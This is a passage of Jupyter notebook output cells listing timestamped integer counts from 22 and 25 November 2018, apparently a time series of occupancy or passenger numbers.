"['2018-11-22 16:11:23', '20']\n",
"['2018-11-22 16:12:26', '19']\n",
"['2018-11-22 16:13:15', '17']\n",
"['2018-11-22 16:14:01', '17']\n",
"['2018-11-22 16:14:25', '17']\n",
"['2018-11-22 16:14:49', '16']\n",
"['2018-11-22 16:15:54', '14']\n",
"['2018-11-22 16:16:44', '12']\n",
"['2018-11-22 16:17:25', '12']\n",
"['2018-11-22 16:18:46', '11']\n",
"['2018-11-22 16:21:37', '3']\n",
"['2018-11-22 16:22:34', '0']\n",
"['2018-11-22 16:25:16', '0']\n",
"['2018-11-22 16:27:58', '0']\n",
"['2018-11-22 16:30:41', '0']\n",
"['2018-11-22 16:33:23', '0']\n",
"['2018-11-22 16:36:06', '2']\n",
"['2018-11-22 16:36:44', '13']\n",
"['2018-11-22 16:40:10', '13']\n",
"['2018-11-22 16:42:46', '15']\n",
"['2018-11-22 16:43:38', '14']\n",
"['2018-11-22 16:44:01', '14']\n",
"['2018-11-22 16:44:41', '14']\n",
"['2018-11-22 16:44:55', '14']\n",
"['2018-11-22 16:45:17', '14']\n",
"['2018-11-22 16:45:41', '14']\n",
"['2018-11-22 16:45:53', '14']\n",
"['2018-11-22 16:47:31', '14']\n",
"['2018-11-22 16:48:24', '18']\n",
"['2018-11-22 16:49:17', '22']\n",
"['2018-11-22 16:50:03', '21']\n",
"['2018-11-22 16:51:26', '23']\n",
"['2018-11-22 16:53:54', '20']\n",
"['2018-11-22 16:55:16', '22']\n",
"['2018-11-22 16:58:06', '21']\n",
"['2018-11-22 16:59:19', '19']\n",
"['2018-11-22 17:00:21', '19']\n",
"['2018-11-22 17:02:15', '19']\n",
"['2018-11-22 17:03:38', '16']\n",
"['2018-11-22 17:06:24', '20']\n",
"['2018-11-22 17:07:13', '17']\n",
"['2018-11-22 17:08:02', '18']\n",
"['2018-11-22 17:10:15', '19']\n",
"['2018-11-22 17:10:57', '19']\n",
"['2018-11-22 17:11:30', '19']\n",
"['2018-11-22 17:12:26', '14']\n",
"['2018-11-22 17:13:25', '12']\n",
"['2018-11-22 17:14:12', '10']\n",
"['2018-11-22 17:14:56', '10']\n",
"['2018-11-22 17:15:46', '10']\n",
"['2018-11-22 17:16:19', '9']\n",
"['2018-11-22 17:17:09', '7']\n",
"['2018-11-22 17:18:13', '7']\n",
"['2018-11-22 17:19:17', '6']\n",
"['2018-11-22 17:20:27', '8']\n",
"['2018-11-22 17:22:30', '8']\n",
"['2018-11-22 17:23:01', '8']\n",
"['2018-11-22 17:23:27', '5']\n",
"['2018-11-22 17:24:13', '0']\n",
"['2018-11-22 17:37:34', '0']\n",
"['2018-11-22 17:38:11', '0']\n",
"['2018-11-22 17:38:50', '0']\n",
"['2018-11-22 17:39:26', '0']\n",
"['2018-11-22 17:40:05', '0']\n",
"['2018-11-22 17:40:36', '2']\n",
"['2018-11-22 17:41:33', '3']\n",
"['2018-11-22 17:42:37', '3']\n",
"['2018-11-22 17:42:57', '4']\n",
"['2018-11-22 17:43:38', '5']\n",
"['2018-11-22 17:44:28', '5']\n",
"['2018-11-22 17:45:05', '6']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 17:45:53', '8']\n",
"['2018-11-22 17:46:41', '11']\n",
"['2018-11-22 17:47:42', '13']\n",
"['2018-11-22 17:48:34', '14']\n",
"['2018-11-22 17:50:02', '14']\n",
"['2018-11-22 17:50:27', '16']\n",
"['2018-11-22 17:51:28', '16']\n",
"['2018-11-22 17:52:58', '17']\n",
"['2018-11-22 17:53:50', '18']\n",
"['2018-11-22 17:59:53', '20']\n",
"['2018-11-22 18:02:19', '20']\n",
"['2018-11-22 18:03:51', '24']\n",
"['2018-11-22 18:05:30', '20']\n",
"['2018-11-22 18:06:24', '17']\n",
"['2018-11-22 18:08:15', '15']\n",
"['2018-11-22 18:09:27', '16']\n",
"['2018-11-22 18:12:03', '17']\n",
"['2018-11-22 18:12:37', '16']\n",
"['2018-11-22 18:12:46', '16']\n",
"['2018-11-22 18:17:36', '16']\n",
"['2018-11-22 18:18:04', '12']\n",
"['2018-11-22 18:19:21', '9']\n",
"['2018-11-22 18:20:18', '9']\n",
"['2018-11-22 18:20:36', '9']\n",
"['2018-11-22 18:20:51', '8']\n",
"['2018-11-22 18:21:42', '7']\n",
"['2018-11-22 18:22:43', '6']\n",
"['2018-11-22 18:23:26', '5']\n",
"['2018-11-22 18:24:05', '4']\n",
"['2018-11-22 18:25:38', '4']\n",
"['2018-11-22 18:27:36', '4']\n",
"['2018-11-22 18:28:21', '2']\n",
"['2018-11-22 18:30:23', '2']\n",
"['2018-11-22 18:32:26', '2']\n",
"['2018-11-22 18:34:28', '2']\n",
"['2018-11-22 18:36:31', '0']\n",
"['2018-11-22 18:38:34', '2']\n",
"['2018-11-22 18:39:20', '7']\n",
"['2018-11-22 18:43:48', '30']\n",
"['2018-11-22 18:46:50', '30']\n",
"['2018-11-22 18:47:28', '31']\n",
"['2018-11-22 18:48:09', '33']\n",
"['2018-11-22 18:49:19', '33']\n",
"['2018-11-22 18:49:32', '33']\n",
"['2018-11-22 18:49:52', '33']\n",
"['2018-11-22 18:50:08', '34']\n",
"['2018-11-22 18:50:50', '34']\n",
"['2018-11-22 18:52:44', '35']\n",
"['2018-11-22 18:53:41', '38']\n",
"['2018-11-22 18:54:34', '36']\n",
"['2018-11-22 18:56:22', '36']\n",
"['2018-11-22 18:56:34', '34']\n",
"['2018-11-22 18:58:31', '33']\n",
"['2018-11-22 18:59:38', '38']\n",
"['2018-11-22 19:02:47', '45']\n",
"['2018-11-22 19:03:31', '41']\n",
"['2018-11-22 19:05:18', '39']\n",
"['2018-11-22 19:06:10', '31']\n",
"['2018-11-22 19:09:02', '25']\n",
"['2018-11-22 19:11:59', '25']\n",
"['2018-11-22 19:12:10', '22']\n",
"['2018-11-22 19:12:49', '21']\n",
"['2018-11-22 19:16:39', '16']\n",
"['2018-11-22 19:17:21', '16']\n",
"['2018-11-22 19:17:46', '16']\n",
"['2018-11-22 19:18:36', '13']\n",
"['2018-11-22 19:19:30', '13']\n",
"['2018-11-22 19:19:48', '16']\n",
"['2018-11-22 19:20:37', '15']\n",
"['2018-11-22 19:21:43', '14']\n",
"['2018-11-22 19:22:26', '13']\n",
"['2018-11-22 19:23:13', '11']\n",
"['2018-11-22 19:24:18', '5']\n",
"['2018-11-22 19:25:37', '4']\n",
"['2018-11-22 19:26:26', '4']\n",
"['2018-11-22 19:26:50', '2']\n",
"['2018-11-22 19:27:35', '1']\n",
"['2018-11-22 19:28:22', '1']\n",
"['2018-11-22 19:28:35', '0']\n",
"['2018-11-22 19:39:34', '0']\n",
"['2018-11-22 19:40:25', '2']\n",
"['2018-11-22 19:41:50', '2']\n",
"['2018-11-22 19:42:34', '2']\n",
"['2018-11-22 19:43:54', '2']\n",
"['2018-11-22 19:44:28', '2']\n",
"['2018-11-22 19:45:47', '2']\n",
"['2018-11-22 19:46:47', '3']\n",
"['2018-11-22 19:47:52', '7']\n",
"['2018-11-22 19:48:53', '8']\n",
"['2018-11-22 19:49:01', '9']\n",
"['2018-11-22 19:50:12', '10']\n",
"['2018-11-22 19:51:08', '11']\n",
"['2018-11-22 19:52:11', '13']\n",
"['2018-11-22 19:53:28', '11']\n",
"['2018-11-22 19:54:43', '12']\n",
"['2018-11-22 19:56:30', '12']\n",
"['2018-11-22 19:57:04', '12']\n",
"['2018-11-22 19:57:15', '11']\n",
"['2018-11-22 19:59:26', '11']\n",
"['2018-11-22 20:00:13', '12']\n",
"['2018-11-22 20:04:48', '15']\n",
"['2018-11-22 20:07:22', '15']\n",
"['2018-11-22 20:08:48', '17']\n",
"['2018-11-22 20:09:49', '15']\n",
"['2018-11-22 20:11:48', '21']\n",
"['2018-11-22 20:14:32', '21']\n",
"['2018-11-22 20:16:21', '24']\n",
"['2018-11-22 20:19:53', '23']\n",
"['2018-11-22 20:20:49', '24']\n",
"['2018-11-22 20:20:57', '21']\n",
"['2018-11-22 20:21:54', '17']\n",
"['2018-11-22 20:23:09', '17']\n",
"['2018-11-22 20:23:19', '14']\n",
"['2018-11-22 20:24:31', '14']\n",
"['2018-11-22 20:24:57', '13']\n",
"['2018-11-22 20:25:19', '13']\n",
"['2018-11-22 20:26:24', '14']\n",
"['2018-11-22 20:27:36', '12']\n",
"['2018-11-22 20:28:44', '12']\n",
"['2018-11-22 20:29:05', '12']\n",
"['2018-11-22 20:30:31', '11']\n",
"['2018-11-22 20:32:59', '5']\n",
"['2018-11-22 20:33:47', '2']\n",
"['2018-11-22 20:34:34', '2']\n",
"['2018-11-22 20:35:21', '2']\n",
"['2018-11-22 20:36:09', '2']\n",
"['2018-11-22 20:36:56', '0']\n",
"['2018-11-22 20:37:44', '1']\n",
"['2018-11-22 20:38:04', '4']\n",
"['2018-11-22 20:40:40', '4']\n",
"['2018-11-22 20:43:23', '4']\n",
"['2018-11-22 20:43:40', '2']\n",
"['2018-11-22 20:44:36', '2']\n",
"['2018-11-22 20:45:20', '2']\n",
"['2018-11-22 20:45:36', '2']\n",
"['2018-11-22 20:46:01', '2']\n",
"['2018-11-22 20:46:28', '2']\n",
"['2018-11-22 20:46:50', '2']\n",
"['2018-11-22 20:49:53', '2']\n",
"['2018-11-22 20:55:44', '4']\n",
"['2018-11-22 20:56:36', '5']\n",
"['2018-11-22 20:57:26', '6']\n",
"['2018-11-22 20:58:14', '7']\n",
"['2018-11-22 21:01:06', '7']\n",
"['2018-11-22 21:02:18', '12']\n",
"['2018-11-22 21:04:41', '11']\n",
"['2018-11-22 21:06:09', '11']\n",
"['2018-11-22 21:06:39', '14']\n",
"['2018-11-22 21:07:26', '11']\n",
"['2018-11-22 21:09:51', '12']\n",
"['2018-11-22 21:12:21', '11']\n",
"['2018-11-22 21:13:03', '9']\n",
"['2018-11-22 21:14:03', '9']\n",
"['2018-11-22 21:16:20', '9']\n",
"['2018-11-22 21:17:11', '9']\n",
"['2018-11-22 21:17:40', '9']\n",
"['2018-11-22 21:18:40', '5']\n",
"['2018-11-22 21:20:01', '1']\n",
"['2018-11-22 21:20:57', '2']\n",
"['2018-11-22 21:21:53', '3']\n",
"['2018-11-22 21:22:42', '4']\n",
"['2018-11-22 21:23:39', '8']\n",
"['2018-11-22 21:24:30', '8']\n",
"['2018-11-22 21:25:37', '7']\n",
"['2018-11-22 21:26:46', '7']\n",
"['2018-11-22 21:27:07', '10']\n",
"['2018-11-22 21:31:12', '9']\n",
"['2018-11-22 21:32:05', '0']\n",
"['2018-11-22 21:33:58', '1']\n",
"['2018-11-22 21:35:43', '1']\n",
"['2018-11-22 21:39:40', '1']\n",
"['2018-11-22 21:39:53', '1']\n",
"['2018-11-22 21:40:26', '0']\n",
"['2018-11-22 21:41:24', '1']\n",
"['2018-11-22 21:42:27', '3']\n",
"['2018-11-22 21:42:36', '3']\n",
"['2018-11-22 21:43:23', '3']\n",
"['2018-11-22 21:44:13', '3']\n",
"['2018-11-22 21:44:53', '3']\n",
"['2018-11-22 21:45:16', '3']\n",
"['2018-11-22 21:46:10', '3']\n",
"['2018-11-22 21:46:42', '3']\n",
"['2018-11-22 21:47:42', '3']\n",
"['2018-11-22 21:48:11', '3']\n",
"['2018-11-22 21:48:20', '3']\n",
"['2018-11-22 21:49:36', '3']\n",
"['2018-11-22 21:49:52', '3']\n",
"['2018-11-22 21:54:15', '3']\n",
"['2018-11-22 21:55:43', '3']\n",
"['2018-11-22 21:56:12', '3']\n",
"['2018-11-22 21:57:43', '3']\n",
"['2018-11-22 21:58:52', '3']\n",
"['2018-11-22 22:00:13', '2']\n",
"['2018-11-22 22:01:18', '0']\n",
"['2018-11-25 06:13:00', '1']\n",
"['2018-11-25 06:13:41', '2']\n",
"['2018-11-25 06:16:00', '2']\n",
"['2018-11-25 06:16:28', '2']\n",
"['2018-11-25 06:17:29', '2']\n",
"['2018-11-25 06:18:00', '2']\n",
"['2018-11-25 06:18:36', '2']\n",
"['2018-11-25 06:19:01', '2']\n",
"['2018-11-25 06:19:19', '2']\n",
"['2018-11-25 06:20:37', '2']\n",
"['2018-11-25 06:21:19', '2']\n",
"['2018-11-25 06:21:41', '2']\n",
"['2018-11-25 06:22:32', '4']\n",
"['2018-11-25 06:23:00', '4']\n",
"['2018-11-25 06:23:39', '4']\n",
"['2018-11-25 06:24:00', '4']\n",
"['2018-11-25 06:24:19', '4']\n",
"['2018-11-25 06:26:00', '3']\n",
"['2018-11-25 06:26:43', '3']\n",
"['2018-11-25 06:30:00', '0']\n",
"['2018-11-25 07:19:00', '3']\n",
"['2018-11-25 07:20:55', '3']\n",
"['2018-11-25 07:21:26', '3']\n",
"['2018-11-25 07:22:00', '3']\n",
"['2018-11-25 07:23:30', '3']\n",
"['2018-11-25 07:24:00', '3']\n",
"['2018-11-25 07:24:46', '3']\n",
"['2018-11-25 07:26:00', '2']\n",
"['2018-11-25 07:26:33', '2']\n",
"['2018-11-25 07:27:08', '2']\n",
"['2018-11-25 07:27:32', '2']\n",
"['2018-11-25 07:28:46', '2']\n",
"['2018-11-25 07:29:23', '2']\n",
"['2018-11-25 07:30:00', '2']\n",
"['2018-11-25 07:30:49', '1']\n",
"['2018-11-25 07:31:41', '0']\n",
"['2018-11-25 07:32:00', '0']\n",
"['2018-11-25 07:34:36', '0']\n",
"['2018-11-25 07:35:00', '0']\n",
"['2018-11-25 07:40:00', '0']\n",
"['2018-11-25 07:40:41', '2']\n",
"['2018-11-25 07:43:00', '3']\n",
"['2018-11-25 07:43:28', '3']\n",
"['2018-11-25 07:44:29', '3']\n",
"['2018-11-25 07:45:00', '3']\n",
"['2018-11-25 07:45:36', '3']\n",
"['2018-11-25 07:46:01', '3']\n",
"['2018-11-25 07:46:19', '3']\n",
"['2018-11-25 07:47:37', '3']\n",
"['2018-11-25 07:48:19', '3']\n",
"['2018-11-25 07:48:41', '3']\n",
"['2018-11-25 07:49:32', '4']\n",
"['2018-11-25 07:50:00', '4']\n",
"['2018-11-25 07:50:39', '4']\n",
"['2018-11-25 07:51:00', '4']\n",
"['2018-11-25 07:51:19', '4']\n",
"['2018-11-25 07:53:00', '5']\n",
"['2018-11-25 07:53:47', '5']\n",
"['2018-11-25 07:58:00', '5']\n",
"['2018-11-25 07:59:00', '5']\n",
"['2018-11-25 08:00:26', '5']\n",
"['2018-11-25 08:02:00', '5']\n",
"['2018-11-25 08:03:00', '5']\n",
"['2018-11-25 08:05:00', '4']\n",
"['2018-11-25 08:06:00', '5']\n",
"['2018-11-25 08:07:01', '5']\n",
"['2018-11-25 08:07:43', '3']\n",
"['2018-11-25 08:08:07', '2']\n",
"['2018-11-25 08:08:51', '2']\n",
"['2018-11-25 08:09:38', '2']\n",
"['2018-11-25 08:10:00', '2']\n",
"['2018-11-25 08:10:43', '2']\n",
"['2018-11-25 08:11:19', '2']\n",
"['2018-11-25 08:12:00', '2']\n",
"['2018-11-25 08:12:53', '2']\n",
"['2018-11-25 08:13:45', '2']\n",
"['2018-11-25 08:14:30', '2']\n",
"['2018-11-25 08:14:55', '2']\n",
"['2018-11-25 08:16:20', '2']\n",
"['2018-11-25 08:17:16', '1']\n",
"['2018-11-25 08:18:00', '1']\n",
"['2018-11-25 08:19:00', '1']\n",
"['2018-11-25 08:19:10', '1']\n",
"['2018-11-25 08:19:32', '1']\n",
"['2018-11-25 08:19:47', '1']\n",
"['2018-11-25 08:20:11', '0']\n",
"['2018-11-25 08:20:33', '0']\n",
"['2018-11-25 08:21:00', '0']\n",
"['2018-11-25 08:25:00', '0']\n",
"['2018-11-25 08:25:40', '0']\n",
"['2018-11-25 08:26:09', '0']\n",
"['2018-11-25 08:26:44', '0']\n",
"['2018-11-25 08:27:12', '0']\n",
"['2018-11-25 08:27:32', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 08:28:00', '0']\n",
"['2018-11-25 08:28:44', '2']\n",
"['2018-11-25 08:31:22', '7']\n",
"['2018-11-25 08:32:00', '7']\n",
"['2018-11-25 08:32:39', '7']\n",
"['2018-11-25 08:33:36', '7']\n",
"['2018-11-25 08:34:00', '7']\n",
"['2018-11-25 08:34:39', '9']\n",
"['2018-11-25 08:35:22', '10']\n",
"['2018-11-25 08:35:55', '10']\n",
"['2018-11-25 08:37:00', '10']\n",
"['2018-11-25 08:38:00', '13']\n",
"['2018-11-25 08:38:49', '13']\n",
"['2018-11-25 08:39:33', '13']\n",
"['2018-11-25 08:40:05', '13']\n",
"['2018-11-25 08:42:00', '13']\n",
"['2018-11-25 08:43:00', '13']\n",
"['2018-11-25 08:45:00', '15']\n",
"['2018-11-25 08:46:00', '15']\n",
"['2018-11-25 08:48:04', '14']\n",
"['2018-11-25 08:49:00', '14']\n",
"['2018-11-25 08:50:00', '3']\n",
"['2018-11-25 08:53:12', '3']\n",
"['2018-11-25 08:54:04', '3']\n",
"['2018-11-25 08:55:00', '6']\n",
"['2018-11-25 08:56:30', '4']\n",
"['2018-11-25 08:57:00', '4']\n",
"['2018-11-25 08:57:46', '4']\n",
"['2018-11-25 08:59:00', '4']\n",
"['2018-11-25 08:59:33', '4']\n",
"['2018-11-25 09:00:08', '4']\n",
"['2018-11-25 09:00:32', '4']\n",
"['2018-11-25 09:01:46', '4']\n",
"['2018-11-25 09:02:23', '4']\n",
"['2018-11-25 09:03:00', '0']\n",
"['2018-11-25 09:03:30', '0']\n",
"['2018-11-25 09:03:52', '0']\n",
"['2018-11-25 09:04:12', '0']\n",
"['2018-11-25 09:04:34', '0']\n",
"['2018-11-25 09:05:03', '0']\n",
"['2018-11-25 09:05:32', '0']\n",
"['2018-11-25 09:06:00', '0']\n",
"['2018-11-25 09:23:00', '1']\n",
"['2018-11-25 09:23:36', '1']\n",
"['2018-11-25 09:24:00', '3']\n",
"['2018-11-25 09:24:30', '3']\n",
"['2018-11-25 09:24:51', '3']\n",
"['2018-11-25 09:25:19', '4']\n",
"['2018-11-25 09:25:42', '4']\n",
"['2018-11-25 09:26:00', '4']\n",
"['2018-11-25 09:26:36', '4']\n",
"['2018-11-25 09:27:01', '4']\n",
"['2018-11-25 09:27:19', '4']\n",
"['2018-11-25 09:28:37', '6']\n",
"['2018-11-25 09:29:19', '6']\n",
"['2018-11-25 09:29:41', '8']\n",
"['2018-11-25 09:30:32', '10']\n",
"['2018-11-25 09:31:00', '11']\n",
"['2018-11-25 09:31:39', '11']\n",
"['2018-11-25 09:32:00', '10']\n",
"['2018-11-25 09:32:19', '10']\n",
"['2018-11-25 09:34:00', '11']\n",
"['2018-11-25 09:34:47', '12']\n",
"['2018-11-25 09:39:00', '11']\n",
"['2018-11-25 09:40:00', '11']\n",
"['2018-11-25 09:41:26', '11']\n",
"['2018-11-25 09:43:00', '11']\n",
"['2018-11-25 09:44:00', '9']\n",
"['2018-11-25 09:46:00', '9']\n",
"['2018-11-25 09:47:00', '9']\n",
"['2018-11-25 09:48:01', '10']\n",
"['2018-11-25 09:48:43', '10']\n",
"['2018-11-25 09:49:07', '10']\n",
"['2018-11-25 09:49:51', '11']\n",
"['2018-11-25 09:50:38', '11']\n",
"['2018-11-25 09:51:00', '11']\n",
"['2018-11-25 09:51:43', '9']\n",
"['2018-11-25 09:52:19', '9']\n",
"['2018-11-25 09:53:00', '9']\n",
"['2018-11-25 09:53:47', '8']\n",
"['2018-11-25 09:54:34', '8']\n",
"['2018-11-25 09:55:13', '8']\n",
"['2018-11-25 09:55:35', '8']\n",
"['2018-11-25 09:58:00', '8']\n",
"['2018-11-25 10:00:03', '2']\n",
"['2018-11-25 10:01:00', '2']\n",
"['2018-11-25 10:02:00', '1']\n",
"['2018-11-25 10:02:25', '1']\n",
"['2018-11-25 10:03:10', '1']\n",
"['2018-11-25 10:04:00', '0']\n",
"['2018-11-25 10:10:00', '1']\n",
"['2018-11-25 10:10:32', '1']\n",
"['2018-11-25 10:13:00', '1']\n",
"['2018-11-25 10:15:29', '3']\n",
"['2018-11-25 10:16:19', '4']\n",
"['2018-11-25 10:17:12', '4']\n",
"['2018-11-25 10:18:28', '5']\n",
"['2018-11-25 10:19:00', '6']\n",
"['2018-11-25 10:19:39', '6']\n",
"['2018-11-25 10:20:22', '6']\n",
"['2018-11-25 10:20:55', '5']\n",
"['2018-11-25 10:22:00', '5']\n",
"['2018-11-25 10:23:00', '7']\n",
"['2018-11-25 10:23:49', '8']\n",
"['2018-11-25 10:24:33', '8']\n",
"['2018-11-25 10:25:05', '8']\n",
"['2018-11-25 10:27:00', '9']\n",
"['2018-11-25 10:28:00', '9']\n",
"['2018-11-25 10:30:00', '13']\n",
"['2018-11-25 10:31:00', '13']\n",
"['2018-11-25 10:33:04', '13']\n",
"['2018-11-25 10:34:00', '13']\n",
"['2018-11-25 10:35:00', '23']\n",
"['2018-11-25 10:38:12', '23']\n",
"['2018-11-25 10:39:04', '26']\n",
"['2018-11-25 10:40:00', '27']\n",
"['2018-11-25 10:41:30', '19']\n",
"['2018-11-25 10:42:00', '17']\n",
"['2018-11-25 10:42:46', '17']\n",
"['2018-11-25 10:44:00', '16']\n",
"['2018-11-25 10:44:33', '17']\n",
"['2018-11-25 10:45:08', '16']\n",
"['2018-11-25 10:45:32', '14']\n",
"['2018-11-25 10:46:46', '14']\n",
"['2018-11-25 10:47:23', '9']\n",
"['2018-11-25 10:48:00', '9']\n",
"['2018-11-25 10:48:49', '9']\n",
"['2018-11-25 10:49:41', '9']\n",
"['2018-11-25 10:50:00', '9']\n",
"['2018-11-25 10:52:36', '7']\n",
"['2018-11-25 10:53:00', '0']\n",
"['2018-11-25 11:05:00', '6']\n",
"['2018-11-25 11:05:55', '9']\n",
"['2018-11-25 11:09:00', '9']\n",
"['2018-11-25 11:09:28', '10']\n",
"['2018-11-25 11:10:29', '10']\n",
"['2018-11-25 11:11:00', '10']\n",
"['2018-11-25 11:11:36', '10']\n",
"['2018-11-25 11:12:01', '10']\n",
"['2018-11-25 11:12:19', '10']\n",
"['2018-11-25 11:13:37', '9']\n",
"['2018-11-25 11:14:19', '18']\n",
"['2018-11-25 11:14:41', '22']\n",
"['2018-11-25 11:15:32', '27']\n",
"['2018-11-25 11:16:00', '27']\n",
"['2018-11-25 11:16:39', '27']\n",
"['2018-11-25 11:17:00', '31']\n",
"['2018-11-25 11:17:19', '31']\n",
"['2018-11-25 11:19:00', '28']\n",
"['2018-11-25 11:19:47', '27']\n",
"['2018-11-25 11:24:00', '37']\n",
"['2018-11-25 11:25:00', '39']\n",
"['2018-11-25 11:26:26', '38']\n",
"['2018-11-25 11:28:00', '41']\n",
"['2018-11-25 11:29:00', '44']\n",
"['2018-11-25 11:31:00', '50']\n",
"['2018-11-25 11:32:00', '65']\n",
"['2018-11-25 11:33:01', '64']\n",
"['2018-11-25 11:33:43', '63']\n",
"['2018-11-25 11:34:07', '63']\n",
"['2018-11-25 11:34:51', '63']\n",
"['2018-11-25 11:35:38', '63']\n",
"['2018-11-25 11:36:00', '58']\n",
"['2018-11-25 11:36:43', '58']\n",
"['2018-11-25 11:37:19', '58']\n",
"['2018-11-25 11:38:00', '58']\n",
"['2018-11-25 11:38:53', '58']\n",
"['2018-11-25 11:39:45', '58']\n",
"['2018-11-25 11:40:30', '58']\n",
"['2018-11-25 11:40:55', '58']\n",
"['2018-11-25 11:42:20', '58']\n",
"['2018-11-25 11:43:16', '0']\n",
"['2018-11-25 11:44:00', '0']\n",
"['2018-11-25 11:45:00', '0']\n",
"['2018-11-25 11:45:10', '0']\n",
"['2018-11-25 11:45:32', '0']\n",
"['2018-11-25 11:45:47', '0']\n",
"['2018-11-25 11:46:11', '0']\n",
"['2018-11-25 11:46:33', '0']\n",
"['2018-11-25 11:47:00', '0']\n",
"['2018-11-25 11:55:00', '0']\n",
"['2018-11-25 11:55:40', '0']\n",
"['2018-11-25 11:56:09', '0']\n",
"['2018-11-25 11:56:44', '0']\n",
"['2018-11-25 11:57:12', '0']\n",
"['2018-11-25 11:57:32', '0']\n",
"['2018-11-25 11:58:00', '0']\n",
"['2018-11-25 11:58:44', '0']\n",
"['2018-11-25 12:01:22', '0']\n",
"['2018-11-25 12:02:00', '0']\n",
"['2018-11-25 12:02:39', '0']\n",
"['2018-11-25 12:03:36', '0']\n",
"['2018-11-25 12:04:00', '0']\n",
"['2018-11-25 12:04:39', '0']\n",
"['2018-11-25 12:05:22', '0']\n",
"['2018-11-25 12:05:55', '0']\n",
"['2018-11-25 12:07:00', '0']\n",
"['2018-11-25 12:08:00', '0']\n",
"['2018-11-25 12:08:49', '22']\n",
"['2018-11-25 12:09:33', '23']\n",
"['2018-11-25 12:10:05', '23']\n",
"['2018-11-25 12:12:00', '17']\n",
"['2018-11-25 12:13:00', '12']\n",
"['2018-11-25 12:15:00', '12']\n",
"['2018-11-25 12:16:00', '14']\n",
"['2018-11-25 12:18:04', '18']\n",
"['2018-11-25 12:19:00', '18']\n",
"['2018-11-25 12:20:00', '38']\n",
"['2018-11-25 12:23:12', '39']\n",
"['2018-11-25 12:24:04', '39']\n",
"['2018-11-25 12:25:00', '44']\n",
"['2018-11-25 12:26:30', '41']\n",
"['2018-11-25 12:27:00', '41']\n",
"['2018-11-25 12:27:46', '39']\n",
"['2018-11-25 12:29:00', '39']\n",
"['2018-11-25 12:29:33', '39']\n",
"['2018-11-25 12:30:08', '38']\n",
"['2018-11-25 12:30:32', '13']\n",
"['2018-11-25 12:31:46', '13']\n",
"['2018-11-25 12:32:23', '13']\n",
"['2018-11-25 12:33:00', '13']\n",
"['2018-11-25 12:33:30', '13']\n",
"['2018-11-25 12:33:52', '13']\n",
"['2018-11-25 12:34:12', '13']\n",
"['2018-11-25 12:34:34', '2']\n",
"['2018-11-25 12:35:03', '2']\n",
"['2018-11-25 12:35:32', '2']\n",
"['2018-11-25 12:36:00', '0']\n",
"['2018-11-25 12:53:00', '1']\n",
"['2018-11-25 12:53:36', '1']\n",
"['2018-11-25 12:54:00', '1']\n",
"['2018-11-25 12:54:30', '1']\n",
"['2018-11-25 12:54:51', '-4']\n",
"['2018-11-25 12:55:19', '-4']\n",
"['2018-11-25 12:55:42', '-4']\n",
"['2018-11-25 12:56:00', '-4']\n",
"['2018-11-25 12:56:36', '-4']\n",
"['2018-11-25 12:57:01', '-4']\n",
"['2018-11-25 12:57:19', '-4']\n",
"['2018-11-25 12:58:37', '-4']\n",
"['2018-11-25 12:59:19', '-4']\n",
"['2018-11-25 12:59:41', '-2']\n",
"['2018-11-25 13:00:32', '-1']\n",
"['2018-11-25 13:01:00', '5']\n",
"['2018-11-25 13:01:39', '5']\n",
"['2018-11-25 13:02:00', '10']\n",
"['2018-11-25 13:02:19', '18']\n",
"['2018-11-25 13:04:00', '18']\n",
"['2018-11-25 13:04:47', '22']\n",
"['2018-11-25 13:09:00', '14']\n",
"['2018-11-25 13:10:00', '17']\n",
"['2018-11-25 13:11:26', '17']\n",
"['2018-11-25 13:13:00', '17']\n",
"['2018-11-25 13:14:00', '15']\n",
"['2018-11-25 13:16:00', '15']\n",
"['2018-11-25 13:17:00', '36']\n",
"['2018-11-25 13:18:01', '35']\n",
"['2018-11-25 13:18:43', '36']\n",
"['2018-11-25 13:19:07', '36']\n",
"['2018-11-25 13:19:51', '37']\n",
"['2018-11-25 13:20:38', '36']\n",
"['2018-11-25 13:21:00', '31']\n",
"['2018-11-25 13:21:43', '29']\n",
"['2018-11-25 13:22:19', '29']\n",
"['2018-11-25 13:23:00', '28']\n",
"['2018-11-25 13:23:47', '28']\n",
"['2018-11-25 13:24:34', '26']\n",
"['2018-11-25 13:25:13', '25']\n",
"['2018-11-25 13:25:35', '25']\n",
"['2018-11-25 13:28:00', '25']\n",
"['2018-11-25 13:30:03', '5']\n",
"['2018-11-25 13:31:00', '2']\n",
"['2018-11-25 13:32:00', '0']\n",
"['2018-11-25 13:32:25', '0']\n",
"['2018-11-25 13:33:10', '0']\n",
"['2018-11-25 13:34:00', '0']\n",
"['2018-11-25 13:40:00', '2']\n",
"['2018-11-25 13:40:32', '22']\n",
"['2018-11-25 13:43:00', '22']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 13:45:29', '22']\n",
"['2018-11-25 13:46:19', '24']\n",
"['2018-11-25 13:47:12', '26']\n",
"['2018-11-25 13:48:28', '26']\n",
"['2018-11-25 13:49:00', '28']\n",
"['2018-11-25 13:49:39', '28']\n",
"['2018-11-25 13:50:22', '28']\n",
"['2018-11-25 13:50:55', '28']\n",
"['2018-11-25 13:52:00', '28']\n",
"['2018-11-25 13:53:00', '28']\n",
"['2018-11-25 13:53:49', '32']\n",
"['2018-11-25 13:54:33', '28']\n",
"['2018-11-25 13:55:05', '30']\n",
"['2018-11-25 13:57:00', '34']\n",
"['2018-11-25 13:58:00', '31']\n",
"['2018-11-25 14:00:00', '33']\n",
"['2018-11-25 14:01:00', '30']\n",
"['2018-11-25 14:03:04', '30']\n",
"['2018-11-25 14:04:00', '28']\n",
"['2018-11-25 14:05:00', '40']\n",
"['2018-11-25 14:08:12', '40']\n",
"['2018-11-25 14:09:04', '39']\n",
"['2018-11-25 14:10:00', '38']\n",
"['2018-11-25 14:11:30', '38']\n",
"['2018-11-25 14:12:00', '38']\n",
"['2018-11-25 14:12:46', '38']\n",
"['2018-11-25 14:14:00', '37']\n",
"['2018-11-25 14:14:33', '36']\n",
"['2018-11-25 14:15:08', '35']\n",
"['2018-11-25 14:15:32', '25']\n",
"['2018-11-25 14:16:46', '25']\n",
"['2018-11-25 14:17:23', '22']\n",
"['2018-11-25 14:18:00', '19']\n",
"['2018-11-25 14:18:49', '19']\n",
"['2018-11-25 14:19:41', '19']\n",
"['2018-11-25 14:20:00', '16']\n",
"['2018-11-25 14:22:36', '10']\n",
"['2018-11-25 14:23:00', '0']\n",
"['2018-11-25 14:34:00', '12']\n",
